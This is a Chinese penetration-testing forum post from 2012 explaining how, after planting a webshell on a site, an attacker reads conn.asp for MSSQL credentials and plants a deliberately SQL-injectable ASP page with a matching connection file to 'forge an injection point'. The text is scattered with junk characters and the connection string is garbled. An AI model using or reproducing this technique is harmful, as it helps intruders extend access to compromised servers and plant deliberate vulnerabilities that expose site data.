中国网络渗透测试联盟
标题:
伪造注入点方法
[打印本页]
作者:
admin
时间:
2012-9-13 17:53
标题:
伪造注入点方法
首先你要拿了一个webshell,这样你找到连接数据库的文件,大多都是conn.asp这个文件里面有mssql的用户和密码,你要找到用户名、密码、数据库所在的IP,然后连接上去,至于连接大家应该都会,找到网站管理员的表。因为我测试的时候是用管理员的表,我朋友说任何表名都可以,只要这个表存在,代码如下:
; E; `: j! V) p7 [4 x* A1 ^
ASP/Visual Basic代码
6 O- Z8 g4 K# ]2 C& r
<!--#include file="xx.asp"-->
4 u0 X1 S6 c/ F z3 q' g
<%
2 V6 ]# b& m# T
set rs=server.createobject("ADODB.recordset")
' L S$ ~4 j6 a2 c8 H
id = request("id")
3 r9 r6 B( A3 C8 q9 g
strSQL = "select * from admin where id=" & id
2 x2 @+ l, k. T+ O
rs.open strSQL,conn,1,3
+ d( R! ]( r3 [
rs.close
: [+ U' K, J/ e1 o
%>
, ^6 d% \ B9 a; E7 i& T" I3 q
把strSQL = "select * from admin where id=" & id 这句话里面的admin换成要伪造的表名,注意必须存在。你可以连接上去看下表名就是了!这里假设的是admin是表名!这个文件名随便保存!
7 u" ~$ c: M ]: B7 L
然后就要构造一个连接数据库的文件了,代码如下:
% `* q8 f7 j7 P& t9 N3 a; i) |, a9 Y
ASP/Visual Basic代码
" R* U1 w* x/ N' M9 K
<%
0 P4 z4 P) V. G
strSQLServerName = "000.000.000.000" '服务器名称或地址
1 G8 j/ O! f0 h8 _) O
strSQLDBUserName = "sqlname" '数据库帐号
7 ]( S, I; u% J" J$ H
strSQLDBPassword = "sqlpass" '数据库密码
7 `, @3 E. |$ P* }
strSQLDBName = "sqldataname" '数据库名称
& c/ X Y9 L: H& Q; X$ O: _* w$ k& e
Set conn = Server.CreateObject("ADODB.Connection")
. h, @5 S2 i( {" [$ d
strCon = "rovider=SQLOLEDB.1ersist Security Info=False;Server=" & strSQLServerName & ";User ID=" & strSQLDBUserName & "assword=" & strSQLDBPassword & ";Database=" & strSQLDBName & ";"
$ _- l% Y( [2 [. i
conn.open strCon
( ^/ M) B. Y/ {" x; b, r( h
%>
8 v; S. E; ~/ f) X! d/ t
这里应该都会了,就不罗嗦了,不过注意的是保存的文件名要和include调用的名字一样。就这样,正常情况下,就OK了,伪造成功
1 h4 P# N' H8 ~" X% c& @
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)
Powered by Discuz! X3.2